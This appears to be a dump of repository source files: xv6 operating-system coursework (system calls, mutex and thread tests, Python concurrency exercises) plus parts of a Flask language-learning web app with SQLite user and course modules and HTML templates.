158, "path": "/sysproc.c", "repo_name": "erichysen/IIT-Classes", "src_encoding": "UTF-8", "text": "#include \"types.h\"\n#include \"x86.h\"\n#include \"defs.h\"\n#include \"param.h\"\n#include \"memlayout.h\"\n#include \"mmu.h\"\n#include \"proc.h\"\n\nint\nsys_fork(void)\n{\n return fork();\n}\n\nint\nsys_exit(void)\n{\n exit();\n return 0; // not reached\n}\n\nint\nsys_wait(void)\n{\n return wait();\n}\n\nint\nsys_kill(void)\n{\n int pid;\n\n if(argint(0, &pid) < 0)\n return -1;\n return kill(pid);\n}\n\nint\nsys_getpid(void)\n{\n return proc->pid;\n}\n\nint\nsys_sbrk(void)\n{\n int addr;\n int n;\n\n if(argint(0, &n) < 0)\n return -1;\n addr = proc->sz;\n if(growproc(n) < 0)\n return -1;\n return addr;\n}\n\nint\nsys_sleep(void)\n{\n int n;\n uint ticks0;\n \n if(argint(0, &n) < 0)\n return -1;\n acquire(&tickslock);\n ticks0 = ticks;\n while(ticks - ticks0 < n){\n if(proc->killed){\n release(&tickslock);\n return -1;\n }\n sleep(&ticks, &tickslock);\n }\n release(&tickslock);\n return 0;\n}\n\n// return how many clock tick interrupts have occurred\n// since start.\nint\nsys_uptime(void)\n{\n uint xticks;\n \n acquire(&tickslock);\n xticks = ticks;\n release(&tickslock);\n return xticks;\n}\n\n//MP1 Additions\nint\nsys_start_burst(void){\n\tint sb = sys_uptime();\n\treturn sb;\n}\nint\nsys_end_burst(void){\n\tint eb = sys_uptime();\n\treturn eb;\n}\nint \nsys_print_bursts(void){\n\tint i;\n\tfor (i=0; i<100; i++){\n\t\tif(proc->burst_array[i] !=0x00){\n\t\t\tcprintf(\"%d,\", proc->burst_array[i]); //print bursts\n\t\t}\n\t}\n\tcprintf (\"Turnaround Time:%d\", sys_end_burst() - proc->turn_burst); // print turnaround time\n\tcprintf(\"\\n\");\n\treturn 0;\n}\n//end mp1 additions\n\n// mp2 additions\nint\nsys_thread_create(void)\n{\n\t//(void*)tmain\n\tchar *tmain, *stack, *arg;\n\targptr(0,&tmain,1); //line 45 syscall.c\n\targptr(1,&stack,0);\n\targptr(2,&arg,0);\n\treturn thread_create((void*)tmain, (void*)stack, (void*)arg);\n}\n\nint\nsys_thread_join(void)\n{\n\tchar *stack;\n\targptr(0,&stack,1);\n\treturn thread_join((void**)stack);\n}\n\nint \nsys_mtx_create(void)\n{\n\tint locked;\n\targint(0,&locked);\n\treturn mtx_lock(locked);\n}\nint\nsys_mtx_lock(void)\n{\n\tint lock_id;\n\targint(0,&lock_id);\n\treturn mtx_lock(lock_id);\n}\nint\nsys_mtx_unlock(void)\n{\n\tint lock_id;\n\targint(0,&lock_id);\n\treturn mtx_unlock(lock_id);\n}\n//end mp2 additions\n" }, { "alpha_fraction": 0.535556972026825, "alphanum_fraction": 0.5607300400733948, "avg_line_length": 16.09677505493164, "blob_id": "29449c951f6270a4ad2757bc8dc53a5379700dea", "content_id": "f02d209f12c3f786b23ebe8262c93bbe0edb0cc3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1589, "license_type": "permissive", "max_line_length": 62, "num_lines": 93, "path": "/prod_con_test.c", "repo_name": "erichysen/IIT-Classes", "src_encoding": "UTF-8", "text": "#include\"types.h\"\n#include\"user.h\"\nstruct yard \n{\n\tint trees;\n\tint stumps;\n\tint acre[15]; //its a prarie 1 tree||stump per acre.\n}yard;\n\nstatic int mutex;\n\n//plant trees in acres where there are stumps \n//producer\nvoid plant_trees (void*arg)\n{\n\tint i, j; \n\tj = 0;\n\tfor(i = 0; i < 15; i++)\n\t{\n\t\tyard.stumps = 15;\n\t\tmtx_lock(mutex);\n\t\tif(yard.stumps == 0)\n\t\t{\n\t\t\tmtx_unlock(mutex);\n\t\t\tsleep(1);\n\t\t} \n\t\telse \n\t\t{\n\t\t\tif(yard.acre[j] == 0)\n\t\t\t{\n\t\t\t\t//printf(\"Planted tree in acre %d\\n\", i);\n\t\t\t\tprintf(1,\"Planted tree in acre %d\\n\", i);\n\t\t\t\tyard.acre[j] = i;\n\t\t\t\tyard.trees ++;\n\t\t\t\tyard.stumps --;\n\t\t\t}\n\t\t\tj++;\n\t\t\tmtx_unlock(mutex);\n\t\t}\n\t}\n\texit();\n}\n\n//chops trees that have been planted\n//consumer\nvoid chop_trees (void*arg)\n{\n\tint i,j;\n\tint spot;\n\tspot =0; \n\tfor(j=0; j < sizeof(yard.acre); j++)\n\t{\n\t\tif(yard.acre[j]!=0)\n\t\t{\n\t\t\tspot = spot +1;\n\t\t}\t\t\n\t}\n\tfor(i = 0; i < 15; i++)\n\t{\n\t\tmtx_lock(mutex);\n\t\tif(yard.trees == 0)\n\t\t{\n\t\t\tmtx_unlock(mutex);\n\t\t\tsleep(10); //force c switch\n\t\t}\t \n\t\telse \n\t\t{\n\t\t\tif(spot>=0)\n\t\t\t{\n\t\t\t\t//printf(\"Chopped tree in acre %d\\n\", yard.acre[spot]);\n\t\t\t\tprintf(1,\"Chopped tree in acre %d\\n\", yard.acre[spot]);\n\t\t\t\tyard.acre[spot] = 0;\n\t\t\t\tyard.trees --;\n\t\t\t\tyard.stumps ++;\n\t\t\t}\n\t\t\tspot--;\n\t\t\tmtx_unlock(mutex);\n\t\t}\n\t}\n\texit();\n}\n\nint main(int argc, char**argv)\n{\n\tmutex = mtx_create(0);\n\tuint* stack = malloc(1024); //stack size 1024 (assumed)\n\tthread_create(*plant_trees,stack,(void*)0); //producer thread\n\tthread_join((void*)0);\n\tthread_create(*chop_trees,stack,(void*)0); //consumer thread\n\tthread_join((void*)1); \n\texit();\n\treturn 0;\n}" }, { "alpha_fraction": 0.5560253858566284, "alphanum_fraction": 0.5778717398643494, "avg_line_length": 17.933332443237305, "blob_id": "222eabe198b7e706f03c30abf50d17e544016b1f", "content_id": "2f4691b702f6c1e6279fa380f7e687c81fbdda06", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1419, "license_type": "permissive", "max_line_length": 69, "num_lines": 75, "path": "/threadtest_sglstack.c", "repo_name": "erichysen/IIT-Classes", "src_encoding": "UTF-8", "text": "#include \"types.h\"\n#include \"user.h\"\n#include \"syscall.h\"\n\n#define NUM_ELEMENTS 100\n\nint mutex;\n\nunsigned short lfsr = 0xACE1u;\nunsigned bit;\n\nunsigned rand() {\n\tbit = ((lfsr >> 0) ^ (lfsr >> 2) ^ (lfsr >> 3) ^ (lfsr >> 5) ) & 1;\n\treturn lfsr = (lfsr >> 1) | (bit << 15);\n}\n\nvoid producer(void *arg) {\n\tint *buffer = (int *)arg;\n\tint p;\n\t\n\tfor (p = 0; p < NUM_ELEMENTS; p++) {\n\t\tmtx_lock(mutex);\n\t\tbuffer[p] = rand();\n\t\tprintf(1, \"Producer put %d\\n\", buffer[p]);\n\t\tmtx_unlock(mutex);\n\t\t\n\t\tif (p == (NUM_ELEMENTS / 2)) {\n\t\t\tsleep(100);\n\t\t}\n\t}\n\t\n\texit();\n}\n\nvoid consumer(void *arg) {\n\tint *buffer = (int *)arg;\n\tint c;\n\t\n\tmtx_lock(mutex);\n\t\n\tprintf(1, \"Consumer has: [\");\n\tfor (c = 0; c < NUM_ELEMENTS; c++) {\n\t\tif (buffer[c] != -1) {\n\t\t\tprintf(1, \"%d, \", buffer[c]);\n\t\t\tbuffer[c] = -1;\n\t\t}\n\t}\n\tprintf(1, \"]\\n\");\n\t\n\tmtx_unlock(mutex);\n\t\n\texit();\n}\n\nint main(int argc, char *argv[]) {\n\tmutex = mtx_create(0);\n\tvoid (*consumerPtr)(void *) = &consumer;\n\tvoid (*producerPtr)(void *) = &producer;\n\tint *main_buffer = (int *)malloc(NUM_ELEMENTS * sizeof(int));\n\t\n\tmemset(main_buffer, -1, NUM_ELEMENTS * sizeof(int *));\n\t\n\tuint *stack = (uint *)malloc(1024);\n\tvoid *return_stack;\n\t\n\tthread_create(producerPtr, (void *)stack, (void *)main_buffer);\n\tthread_join((void **)&return_stack);\n\t\n\tthread_create(consumerPtr, (void *)stack, (void *)main_buffer);\n\tthread_join((void **)&return_stack);\n\n\tfree(&return_stack);\n\t\n\texit();\n}" }, { "alpha_fraction": 0.5977205038070679, "alphanum_fraction": 0.6033258438110352, "avg_line_length": 32.24844741821289, "blob_id": "9f103c180ae48a306dc0646468743027adde9ca7", "content_id": "eb79e69d11811706426ddad3c8671144e4de216c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5352, "license_type": "permissive", "max_line_length": 115, "num_lines": 161, "path": "/mp3/3_philosophers.py", "repo_name": "erichysen/IIT-Classes", "src_encoding": "UTF-8", "text": "\"\"\"Hard coded variables are on lines 11-12. Just run with Python3 3_philosophers.py\"\"\"\nfrom threading import Semaphore, Thread\nimport time\nfrom time import sleep\nimport timeit\nimport random\n\nrand = random.Random()\nrand.seed(100)\n#***************************************#\nnum_philosophers = 5\nmeals = 5\n#***************************************#\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\n\"\"\"each philosopher shares his left and right fork with neighbor. get fork and put fork\nboth use the sharing concept to modify individual fork mutexes even though there is only 1 per\nphilosopher to prevent multiple users from using a fork at the same time.\"\"\"\nclass Philosopher:\n def __init__(self, num):\n self.mutex = Semaphore(1)\n self.lfork = num\n self.rfork = (num-1) % num_philosophers\n self.state = \"THINKING\"\n def __repr__(self): # debug print\n return self.lfork\n\ndef get_forks(p): #right first\n philosophers[int(philosophers[p].rfork)].mutex.acquire()\n philosophers[int(philosophers[p].lfork)].mutex.acquire()\n\ndef put_forks(p):\n philosophers[int(philosophers[p].rfork)].mutex.release()\n philosophers[int(philosophers[p].lfork)].mutex.release()\n \n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\n\"\"\"\nFootman\n\nThe \"footman\" solution: where a single semaphore (a multiplex) limits the number of \nphilosophers that can simultaneously \"try\" to dine.\n\"\"\"\nfoot = Semaphore((num_philosophers-1)%num_philosophers) #limit number of philosophers that can try to dine\ndef get_left_forks(p) : #left first (same as previous get_forks except acquires l.fork first)\n philosophers[int(philosophers[p].lfork)].mutex.acquire()\n philosophers[int(philosophers[p].rfork)].mutex.acquire()\n \ndef footman_thread(p):\n rand_num = rand.random()\n num_meals=0 \n while num_meals!=meals:\n foot.acquire()\n get_forks(p)\n num_meals +=1\n sleep (rand_num)\n put_forks(p)\n foot.release()\n\ndef Footman() :\n footman_array=[] \n start = timeit.default_timer()\n for i in range(num_philosophers):\n f_thread = Thread(target=footman_thread, args=[i])\n f_thread.start()\n footman_array.append(f_thread)\n for thread in footman_array:\n thread.join()\n stop = timeit.default_timer()\n print ('1.Footman solution, time elapsed:',str(stop - start)+'s')\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\n\"\"\"\nLeft-handed\n\nThe \"left-handed philosopher\" solution: where one of the philosophers attempts to \npick up his left fork first (whilst all other philosophers start with their right).\n\"\"\"\ndef left_handed_thread(p):\n rand_num = rand.random()\n num_meals=0\n while num_meals!=meals:\n if p==0 :\n get_left_forks(p)\n sleep (rand_num)\n else : \n get_forks(p)\n sleep (rand_num)\n num_meals +=1 \n put_forks(p)\n \ndef Left_handed() :\n lefthand_array=[]\n start = timeit.default_timer()\n for i in range(num_philosophers):\n lh_thread = Thread(target=left_handed_thread, args=[i])\n lh_thread.start()\n lefthand_array.append(lh_thread)\n for thread in lefthand_array:\n thread.join()\n stop = timeit.default_timer()\n print ('2.Left-handed solution, time elapsed:',str(stop - start)+'s')\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\n\"\"\"\nTanenbaum\n\nThe Tanenbaum solution: which has philosophers re-checking forks for neighboring, \nhungry philosophers.\n\"\"\"\nmutex = Semaphore(1)\n\ndef get_fork_t(p): #similar to get_fork except tests for adjacent philosophers for their forks\n mutex.acquire()\n philosophers[p].state = 'HUNGRY'\n test(p)\n mutex.release()\n \ndef put_fork_t(p): #similar to put_fork except starts test to see if neighbors are able to eat after p is done\n mutex.acquire()\n philosophers[p].state = 'THINKING'\n test((p+num_philosophers-1)%num_philosophers)\n test((p-num_philosophers-1)%num_philosophers)\n mutex.release()\n \n# test to see if the neighbours are eating\ndef test(p):\n if philosophers[p].state=='HUNGRY' and philosophers[(p+num_philosophers-1)%num_philosophers].state!='EATING' \\\n and philosophers[(p+1)%num_philosophers].state!='EATING':\n philosophers[p].state='EATING'\n \ndef tanenbaum_thread(p):\n rand_num = rand.random()\n num_meals = 0\n while num_meals != meals:\n get_fork_t(p)\n sleep(rand_num)\n num_meals+=1\n put_fork_t(p)\n\ndef Tanenbaum() :\n tannenbaum_array=[]\n start = timeit.default_timer()\n for i in range(num_philosophers):\n t_thread = Thread(target=tanenbaum_thread, args=[i]) \n t_thread.start()\n tannenbaum_array.append(t_thread)\n for thread in tannenbaum_array:\n thread.join()\n stop = timeit.default_timer()\n print ('3.Tanenbaum\\'s solution, time elapsed:',str(stop - start)+'s')\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\n\n# main function\nif __name__ == '__main__':\n philosophers = []\n for i in range (num_philosophers):\n philosophers.append(Philosopher(i))\n print(\"Running dining philosophers simulation:\", num_philosophers,\"philosophers,\",meals, \"meals each.\")\n Footman()\n Left_handed()\n Tanenbaum()" }, { "alpha_fraction": 0.5591692924499512, "alphanum_fraction": 0.5660266280174255, "avg_line_length": 29.933332443237305, "blob_id": "bf5ab431b4170fdbeec9c068cc99999fbb7f4999", "content_id": "7d49f8aa4594a722afed1fc2658e1a4eb1d10529", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5104, "license_type": "permissive", "max_line_length": 110, "num_lines": 165, "path": "/mp3/2_dance_mixer.py", "repo_name": "erichysen/IIT-Classes", "src_encoding": "UTF-8", "text": "\"\"\"Hard coded variables are on lines 9-11. Just run with Python3 2_dance_mixer.py\"\"\"\nfrom threading import Semaphore,Thread\nimport time\nfrom time import sleep\nimport random\nfrom itertools import cycle\nfrom collections import deque\n#***************************************#\nnum_leaders = 3\nnum_followers = 5\nsong_length = 5\n#***************************************#\npair = [None]*2\nrand = random.Random()\nrand.seed(100)\n\nclass ballroom:\n def __init__(self):\n self.song_time = song_length\n self.music_list = ['Dubstep','Taylor Swift','Michael Jackson','Livin La Vida Loca']\n self.dancing = Semaphore(0)\n self.waiting = Semaphore(0)\n self.leaderSem = Semaphore(0)\n self.followerSem = Semaphore(0)\n self.mutex = Semaphore(1)\n self.dancers = 0\n self.closed = True\n self.music_on = True\nbr = ballroom()\n\ndef open_floor():\n br.dancing.release()\ndef close_floor():\n br.dancing.acquire()\n br.waiting.acquire()\ndef enter():\n br.dancing.acquire()\n br.mutex.acquire()\n br.dancers += 1\n br.mutex.release()\n br.dancing.release()\ndef line_up():\n br.mutex.acquire()\n br.dancers -= 1\n if br.dancers == 0 and br.closed:\n br.waiting.release()\n br.mutex.release()\n\nclass dance_queue:\n global br\n leader_queue = deque()\n follower_queue = deque()\n leaders = Semaphore(0)\n followers = Semaphore(0)\n def append(type, waitingSem):\n if type == \"Leader\":\n dance_queue.leader_queue.appendleft(waitingSem)\n dance_queue.leaders.release()\n else:\n dance_queue.follower_queue.appendleft(waitingSem)\n dance_queue.followers.release()\n def pop():\n dance_queue.leaders.acquire()\n dance_queue.followers.acquire()\n popped_leader = dance_queue.leader_queue.pop()\n popped_leader.release()\n popped_follower = dance_queue.follower_queue.pop()\n popped_follower.release()\n\nclass Dancer:\n def __init__(self, num, type):\n global br\n self.type = type\n self.num = num\n self.waitingSem = Semaphore(0)\n self.partner = None\n if type == \"Leader\": #leader wait\n self.arrivedSem = br.leaderSem\n self.partnerSem = br.followerSem\n else: #follower wait\n self.arrivedSem = br.followerSem\n self.partnerSem = br.leaderSem\n #def set_partner(dancer):\n #self.partner=dancer\n\n def __repr__(self): #prints out the dancer and the number associated with them\n return self.type+\" \"+str(self.num)\n \n def dance(self):\n global br\n dancing_time = rand.random()\n while(1):\n dance_queue.append(self.type, self.waitingSem)\n self.waitingSem.acquire()\n enter()\n if br.music_on == False: #see if dancing can begin\n break\n print(self.type+\" \"+ str(self.num) + \" entering floor\")\n\n if self.type == \"Leader\":\n self.partnerSem.acquire()\n pair[0]=self\n self.arrivedSem.release()\n if pair[0] and pair[1]:\n print(\"Leader \"+ str(pair[0].num) + \" and Follower \" + str(pair[1].num) + \" are dancing.\")\n #print(pair[0]+ \" and \" + pair[1] + \" are dancing.\")\n dance_queue.pop()\n else: \n pair[1]=self\n self.arrivedSem.release()\n self.partnerSem.acquire()\n sleep(dancing_time)\n line_up()#line back up \n print(self.type+\" \"+ str(self.num)+ \" is getting back in line.\")\n\ndef start_music(dance):\n print(\"\\n** Band Leader started playing \" + dance + \" **\")\n open_floor()\ndef end_music(dance):\n close_floor()\n print(\"** Band Leader stopped playing \" + dance + \" **\\n\")\n\n#dj changes music and opens/closes the dance floor\ndef dj_thread():\n dance_queue.pop() #get first pair released for dance\n for dance in cycle(br.music_list):\n start_music(dance)\n sleep(br.song_time)\n end_music(dance)\n#d = dj()\n\nif __name__ == '__main__':\n \n # dj\n dj = Thread(target= dj_thread)\n leaders_array =[]\n followers_array = []\n dancing_time = rand.random()\n dancer_array = []\n\n for i in range(num_leaders):\n l = Dancer(i,\"Leader\")\n dancer_array.append(l)\n leaders_array.append(Thread(target = l.dance))\n #leaders_array.append(Thread(target = l.dance, args=(l,)))\n leaders_array[i].start()\n\n for i in range(num_followers):\n f = Dancer(i,\"Follower\")\n dancer_array.append(f)\n followers_array.append(Thread(target = f.dance))\n #followers_array.append(Thread(target = f.dance, args=(f,)))\n followers_array[i].start()\n\n dj.start()\n dj.join()\n #sleep(dancing_time)\n br.music_on = False\n open_floor()\n for dancer in dancer_array:\n dancer.waitingSem.release()\n for i in range(0, num_leaders):\n leaders_array[i].join()\n for i in range(0, num_followers):\n followers_array[i].join()\n" } ]
6
jingzhao3200/deeplabv3_cv_project
https://github.com/jingzhao3200/deeplabv3_cv_project
3a287d9d76174ca48f964a3a51b3d5da26bb936e
e94b9dde23bad769a011aea71df639111e3abed5
1f7c17a814537e4c5d91eec049fabb56b9e92d9a
refs/heads/master
2020-05-18T08:40:31.479804
2019-05-02T14:52:22
2019-05-02T14:52:22
184,301,976
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7126696705818176, "alphanum_fraction": 0.733031690120697, "avg_line_length": 22.157894134521484, "blob_id": "cdc2d4f5618beea53847886148f0ddc72c832ae3", "content_id": "b4c3c4444553132dde37c25d4c67ee5ff940c4a6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 442, "license_type": "permissive", "max_line_length": 97, "num_lines": 19, "path": "/kitti/devkit_semantics/devkit/prepare.py", "repo_name": "jingzhao3200/deeplabv3_cv_project", "src_encoding": "UTF-8", "text": "import scipy.misc as sp\nimport matplotlib.pyplot as plt\n\nimport os\nos.chdir('../../data_semantics/training/')\nprint (os.getcwd())\n\n# reading the instance and semantic segmentation ground truth from the combined ground truth file\n\nimageName = '000000_10'\nim = sp.imread('image_2/'+imageName+'.png')\nplt.imshow(im)\nplt.show()\n\nsemantic_gt = sp.imread('semantic/'+imageName+'.png')\nplt.imshow(semantic_gt)\nplt.show()\n\nprint(semantic_gt.shape)\n\n\n" } ]
1
cl-dec/Find-the-Good-Boy
https://github.com/cl-dec/Find-the-Good-Boy
d94b26cb3602f4e6756715b6a8c8f06f4c87c7a2
492317d589722488d318cd5b22bc9c7f94cf18fd
c9a8a79948917b176bc784b54418391d8787595a
refs/heads/main
2023-01-09T20:05:04.776522
2020-11-11T04:14:33
2020-11-11T04:14:33
310,729,761
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7571116089820862, "alphanum_fraction": 0.7702407240867615, "avg_line_length": 49.66666793823242, "blob_id": "965986cb63ab533da8045f1e7ed4ba2a2548c508", "content_id": "665b1c3aa011f14d400b4ddf75ac645c61411456", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 457, "license_type": "no_license", "max_line_length": 231, "num_lines": 9, "path": "/README.md", "repo_name": "cl-dec/Find-the-Good-Boy", "src_encoding": "UTF-8", "text": "Find the Good Boy: The Python Text Game\n\nIn Find the Good Boy, the user must input a value from a list given to them until they guess the answer correctly. The correct answer is randomly generated from the elements in the list and is different every time the game is run. \n\nThe object of the game is to find the user's dog who is trapped somewhere in the house. \nInspired by Loki, the cat trapped in the drawer.\n\nGame created by: Annastasia Fultz \nNovember 10, 2020 \n" }, { "alpha_fraction": 0.7066666483879089, "alphanum_fraction": 0.7066666483879089, "avg_line_length": 62.28571319580078, "blob_id": "d0502d61b7dbc5d0cbaf63448e59c51a2e2d2371", "content_id": "5d3e01a01a384f23e29f6dcaba757083678c5495", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1350, "license_type": "no_license", "max_line_length": 301, "num_lines": 21, "path": "/game.py", "repo_name": "cl-dec/Find-the-Good-Boy", "src_encoding": "UTF-8", "text": "# Every time the game is run, the dog will be assigned to a room location randomly.The user will be given a list of rooms to pick from until the dog is found. When the mission is complete, the user recieves a congratulation message. However, if the user guesses wrong, they will be asked to try again.\r\n\r\nimport random\r\n#rooms to pick from\r\nrooms = (\" KITCHEN\", \" BATHROOM\", \" OFFICE\", \" DEN\", \" BASEMENT\", \" CLOSET\")\r\ndog = random.choice(rooms)\r\nprint(\"You are doing your homework when you hear your dog whimpering from somewhere downstairs. Figuring that he accidentally locked himself out when running out the back door, but he wasn't outside. It's now your mission to find him before your parents come home.\")\r\nprint(\"Directions:\")\r\nprint(\"When prompted, choose a room from the list to check in first. Continue searching through the house until you find him. But remember: he may never hide in the same place twice.\")\r\nprint(\"Choose a room: kitchen, bathroom, closet, den, basement, or office.\")\r\n\r\nwhile True:\r\n rooms = (\" KITCHEN\", \" BATHROOM\", \" OFFICE\", \" DEN\", \" BASEMENT\", \" CLOSET\")\r\n dog = random.choice(rooms)\r\n guess = input(\"Please choose a direction\")\r\n guess = guess.upper()\r\n if guess in dog:\r\n print(\"Congratulations! You found the good boy!\")\r\n break\r\n else:\r\n print(\"Please guess again.\")\r\n" } ]
2
DanielSherlock/LLADI
https://github.com/DanielSherlock/LLADI
82a0f32b1d40ca1c1a2f6b4d0a80420be4495628
3b24f9b01b07eaead8aa64b409cdd828167044b0
df2c7953399a4f782c37723e2235b9f229e3cb59
refs/heads/master
2021-01-21T16:57:10.637311
2015-01-05T23:43:22
2015-01-05T23:43:22
28,831,843
1
0
null
2015-01-05T21:08:16
2014-12-29T19:08:17
2014-12-29T19:08:17
null
[ { "alpha_fraction": 0.7903226017951965, "alphanum_fraction": 0.7903226017951965, "avg_line_length": 30, "blob_id": "388c16fff13686ebb8b603aaacdcd346e64b7103", "content_id": "e67bc3238971c96ca8f5bb0f36d58f7d59fd294d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 62, "license_type": "no_license", "max_line_length": 33, "num_lines": 2, "path": "/LLADI/database/__init__.py", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "from .users import User, new_user\nfrom .follows import Follow\n" }, { "alpha_fraction": 0.5581497550010681, "alphanum_fraction": 0.5665197968482971, "avg_line_length": 30.971830368041992, "blob_id": "aa457165feb0d0855a93de648b956d3bc03b1d39", "content_id": "a77e2d81c19a73adf55cfc73b7e815e5fc2be8e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2270, "license_type": "no_license", "max_line_length": 120, "num_lines": 71, "path": "/LLADI/database/users.py", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "import sqlite3\nimport base64\nfrom time import strftime, gmtime\nfrom . import follows\n\ndb_url = 'C:\\\\Users\\\\Daniel\\\\Documents\\\\GitHub\\\\LLADI\\\\database\\\\lladi.db'\n\n\nclass User():\n def __init__(self, uuid=0, username=\"\"):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n if uuid:\n cur.execute('SELECT * FROM \"User\" WHERE \"UUID\" LIKE ?', (uuid,))\n elif username:\n cur.execute('SELECT * FROM \"User\" WHERE \"Username\" LIKE ?', (username,))\n data = cur.fetchone()\n if data:\n self.exists = True\n self.uuid = data[0]\n self.username = data[1]\n self.password = data[2]\n self.display_name = data[3]\n self.picture = data[4]\n self.date = data[5]\n self.follows = follows.Follow(follower=self.uuid).data\n self.followed_by = follows.Follow(followee=self.uuid).data\n cur.execute('SELECT \"Key UKID\", \"Knowledge\" FROM \"Key Knowledge\" WHERE \"User UUID\" LIKE ?', (self.uuid,))\n self.keys = {}\n for key in cur.fetchall():\n self.keys[key[0]] = key[1]\n print(self.keys)\n else:\n self.exists = False\n conn.close()\n\n def __del__(self):\n pass\n\n\ndef search_user(search):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n cur.execute('SELECT \"UUID\" FROM \"User\" WHERE \"Display Name\" LIKE ?', (\"%\" + search + \"%\",))\n data = cur.fetchall()\n conn.close()\n ret = []\n for suser in data:\n ret.append(User(int(suser[0])))\n return ret\n\n\ndef new_user(username, password, display_name):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n date = strftime(\"%Y%m%d%H%M%S\", gmtime())\n cur.execute(\"insert into User('Username', 'Password', 'Display Name', 'Creation Date') VALUES(?, ?, ?, ?)\",\n (username, password, display_name, date))\n conn.commit()\n conn.close()\n\n\ndef get_tier_knowledge(course, user):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n cur.execute('SELECT \"Tier\" FROM \"Tier Knowledge\" WHERE \"Course UCID\" LIKE ? AND \"User UUID\" LIKE ?', (course, user))\n data = cur.fetchone()\n conn.close()\n if not data:\n return 0\n return data[0]\n" }, { "alpha_fraction": 0.5210191011428833, "alphanum_fraction": 0.5318471193313599, "avg_line_length": 41.4594612121582, "blob_id": "d687f78f9e0e0ac9f6aa47cb2f0188dce45a14fa", "content_id": "78f865ffbdacf619863ebac3c2deab22c9d56cd0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1570, "license_type": "no_license", "max_line_length": 116, "num_lines": 37, "path": "/templates/page/course.html", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "<div class=\"container\">\n <h3>{{ course.course_name }}</h3>\n\n <div class=\"container col-md-8 well\">\n {% for lesson in lessons %}\n <a href=\"/lesson/{{ lesson.ulid }}\" class=\"btn btn-default\" style=\"margin:5px;\" {% if lesson.tier>\n tier+1%}disabled{% endif %}>{{ lesson.name }}\n </a>\n {% endfor %}\n {% if logged.uuid == owner.uuid %}\n <br>\n <a class=\"btn btn-info clearfix\" href=\"/create/course/{{ course.ucid }}/lesson\" style=\"margin:5px;\">Create a\n Lesson</a>\n <a class=\"btn btn-info clearfix\" href=\"/edit/course/{{ course.ucid }}/lesson\" style=\"margin:5px;\">Edit a\n Lesson</a>\n {% endif %}\n {% for contributor in contributors %}\n {% if logged.uuid == contributor.uuid %}\n <br>\n <a class=\"btn btn-info clearfix\" href=\"/create/course/{{ course.ucid }}/lesson\" style=\"margin:5px;\">Create a\n Lesson</a>\n <a class=\"btn btn-info clearfix\" href=\"/edit/course/{{ course.ucid }}/lesson\" style=\"margin:5px;\">Edit a\n Lesson</a>\n {% endif%}\n {% endfor %}\n </div>\n <div class=\"container col-md-3 col-md-offset-1 well\">\n <h4>Contributors</h4>\n <ul class=\"list-unstyled\">\n <li><h5><strong><a href=\"/user/{{ owner.uuid }}\">{{ owner.display_name }}</a></strong></h5></li>\n {% for contributor in contributors %}\n <li><h5><a href=\"/user/{{ contributor.uuid }}\">{{ contributor.display_name }}</a></h5></li>\n {% endfor %}\n\n </ul>\n </div>\n</div>" }, { "alpha_fraction": 0.7222222089767456, "alphanum_fraction": 0.7222222089767456, "avg_line_length": 21.75, "blob_id": "3990714bf94e1d05ac1049687e890ecf05114578", "content_id": "29f34890d6f3f443aed7d9005a73bf427cd719f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 90, "license_type": "no_license", "max_line_length": 38, "num_lines": 4, "path": "/LLADI/functions/__init__.py", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "__author__ = 'Sam'\n\nfrom .login import log_in, valid_login\nfrom .users import current_user" }, { "alpha_fraction": 0.6908212304115295, "alphanum_fraction": 0.6908212304115295, "avg_line_length": 22, "blob_id": "dacf27dfc0bb9ae2c8de7678bb46dae0179cacd0", "content_id": "53bcd93ae8459ffb966eeb8faba73cd25acab1d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 207, "license_type": "no_license", "max_line_length": 55, "num_lines": 9, "path": "/LLADI/functions/users.py", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "from flask import session, request\nfrom LLADI.database import users\n\n\ndef current_user():\n if 'username' in session:\n return users.User(username=session['username'])\n else:\n return False\n" }, { "alpha_fraction": 0.7409326434135437, "alphanum_fraction": 0.7409326434135437, "avg_line_length": 28.769229888916016, "blob_id": "a05efedc98f00207199c970ac3030dd1bfb77c18", "content_id": "355983c3ce4437f463e90ebdc884774a5c77241f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 386, "license_type": "no_license", "max_line_length": 73, "num_lines": 13, "path": "/LLADI/functions/register.py", "repo_name": 